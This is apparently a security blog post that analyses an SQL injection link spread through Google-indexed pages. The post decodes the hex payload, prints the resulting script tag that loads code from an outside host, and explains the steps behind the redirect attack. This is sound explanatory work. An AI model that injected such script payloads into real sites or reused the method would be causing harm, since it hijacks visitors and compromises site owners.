More and more of today's web application attacks are leveraging multiple weaknesses/vulnerabilities or attacks in order to achieve a desired exploitation outcome. It is becoming more and more difficult to neatly place an attack into one specific container (such as XSS, SQL Injection, etc...) and instead include many issues together.
One great example of this that I recently ran into was an attack scenario posted to the SANS Advisory Board mail-list. The user had setup some Google Alerts to monitor his public facing web site. He didn't specify the details, however it is assumed that he was attempting to monitor for traditional Google Hacking infoleakage types of problems. In this particular case, the user received a Google Alert email with an odd looking link pointing to a resource on one of his site. The link looked as follows -
<a style=3D"color: blue" href=3D"http://munge.munge.edu/new_skills/workshop/info.php?
At first glance, it is easy to see that if the user clickes on this link that it would send an SQL Injection attack (due to the union and select keywords and formatting) aimed at the "wid" parameter of the "info.php" web page. What isn't so apparent is the data that is being extracted from the database. The union/select command combination is normally used by attackers to extract data from a DB however this sql query is not specifying any specific tables or columns. The user described that if the link is actually clicked on (which was a bad idea as it actually launched the attack), then the user would be redirected to some porn sites.
So what is happening here?
The data within the SQL Injection query payload is actually Hex encoded. If you decode this data, you will see the following data -
<script src="http://traf.in/c.php"></script>,Porntrailers,0,0,Amateur sex videos/
The ultimate goal with this attack is to force users to visit these porn sites. The methodology used is -
- Attacker identifies a website that has an SQL Injection vulnerability.
- They then place web links, that contain the SQL Injection payload targeting the vulnerable site, on other web site.
- Googlebot then crawls the attacker's sites and index's the attack weblink.
- Anyone running Google searches or in this case who has a Google Alert setup that matched, will receive this malicious link.
- If they click on the link, they will launch an SQL Injection attack against the website.
- The user will then be redirected to a porn site.
The concept of using SQL Injection as an XSS mechanism to distribute malicious code started with the Mass SQL Injection Bots (Stored XSS as opposed to Reflective XSS in this case) and appears to be continuing as bad guys figure out more and more ways to monetize it.